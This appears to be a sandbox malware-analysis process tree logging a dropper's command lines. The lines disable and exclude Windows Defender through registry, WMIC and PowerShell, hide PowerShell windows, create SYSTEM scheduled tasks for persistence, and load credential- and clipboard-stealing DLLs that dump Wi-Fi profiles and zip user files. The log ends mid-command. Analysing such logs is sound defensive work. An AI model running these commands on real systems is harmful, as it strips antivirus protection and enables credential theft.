\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe\" Wt /aVWdidKPsl 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exeC:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6bd1e1d0,0x6bd1e1dc,0x6bd1e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428155250" --session-guid=cbcc7ac2-ab91-4673-88dc-3da3085ddca0 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=74050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exeC:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6986e1d0,0x6986e1dc,0x6986e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe" --version5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x2a6038,0x2a6044,0x2a60506⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\696768468217_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1856 -ip 18561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1832 -ip 18321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3472 -ip 34721⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe Wt /aVWdidKPsl 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
[depth 3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files 